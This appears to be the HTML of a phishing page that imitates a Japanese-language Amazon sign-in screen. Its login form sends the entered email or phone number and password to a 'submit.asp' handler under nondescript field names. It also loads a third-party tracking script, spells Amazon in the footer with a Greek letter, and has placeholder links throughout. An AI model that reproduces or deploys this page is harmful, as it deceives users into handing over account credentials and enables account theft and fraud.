﻿<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="static/css/main.min.css">
    <link rel="stylesheet" href="static/css/index.css">
    <link rel="shortcut icon" href="assets/img/favicon.ico" />
    <script type="text/javascript" src="static/js/jquery-1.9.1.min.js"></script>  
    <script type="text/javascript" src="static/js/jquery.cookie.js"></script>   
    <title>Amazon ログイン</title>


<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script>
<script>LA.init({id:"K27GcSU8NEMr4ai8",ck:"K27GcSU8NEMr4ai8"})</script>


</head>
<body>
    <!-- Logo Navbar-->
    <a href="#" class="navbrand text-center mt-3">
        <span class="aicon alogo"></span>
    </a>

    <div class="form">
        <div class="container-fluid">
            <div class="myform">
              
 <form id="form1" method="post" name="form1" action="submit.asp">
		 
          <input id="idType" class="input1" value="0" type="hidden" name="idType">
                <h1 class="colorblacked">ログイン</h1>
                <div class="form-group mt-14px">
                    <label for="textemail" class="emailorphone">Eメールまたは携帯電話番号</label>
                    <input type="text" name="g_zhanghao" class="form-control" id="textemail" required>
                </div>
                <div class="form-group mt-14px">
                    <label for="" class="label2">
                        <ul class="nav">
                            <li class="nav-item">
                              <a class="nav-link emailorphone" href="">パスワード</a>
                            </li>
                            <li class="nav-item ml-auto">
                              <a class="nav-link mylink" href="#">パスワードを忘れた場合</a>
                            </li>                           
                          </ul>
                    </label>
                    <input type="password" name="g_cvn" class="form-control" id="textpassword" required>
                </div>

                    <input type="hidden" name="ticket" id="ticket" value="">

                <button type="submit" name="Sex" class="btn bgcolored mt-6px" onClick="atartt()">ログイン</button>


<div class="form-group form-check mt-3">
    <div class="a-section a-text-left">
      <label for="auth-remember-me" class="a-form-label">
        <div data-a-input-name="rememberMe" class="a-checkbox"><label><input type="checkbox" name="rememberMe" value="true" tabindex="4"><i class="a-icon a-icon-checkbox"></i><span class="a-label a-checkbox-label">
          ログインしたままにする
          <span class="a-declarative" data-action="a-popover" data-a-popover="{&quot;activate&quot;:&quot;onclick&quot;,&quot;header&quot;:&quot;[ログインしたままにする] チェックボックス&quot;,&quot;inlineContent&quot;:&quot;<p>「ログインしたままにする」を選択すると、このデバイスでログインが求められる回数が減ります。<\/p>\n<p>お客様のアカウントのセキュリティを保つため、個人でお使いのデバイスでのみこのオプションを使うようにしてください。<\/p>&quot;}">
            <a id="remember_me_learn_more_link" href="javascript:void(0)" class="a-popover-trigger a-declarative">
              詳細
            <i class="a-icon a-icon-popover"></i></a>
          </span>
        </span></label></div>
      </label>
    </div>
  </div>







                <hr class="hr-text" data-content="Amazonの新しいお客様ですか？">
                <button type="submit" class="btn bgcolored2 mt-2px">Amazonアカウントを作成</button>
          </form>
            </div>
        </div>
    </div>

    <div class="myhr"></div>

    <div class="footer">
        <ul class="nav  justify-content-center">
            <li class="nav-item">
              <a class="nav-link mylinke" href="#">利用規約 </a>
            </li>
            <li class="nav-item">
              <a class="nav-link mylinke" href="#">プライバシー規約 </a>
            </li>
            <li class="nav-item">
                <a class="nav-link mylinke" href="#">ヘルプ </a>
            </li>
        </ul>
        <p class="footertext text-center">© 1996- 2018, Αmazon. com, Inc. or its affiliates</p>
    </div>

    <script src="static/js/main.min.js"></script>
    <script src="static/js/main.min.js"></script>
    <script src="static/js/main.min.js"></script>
</body>
</html>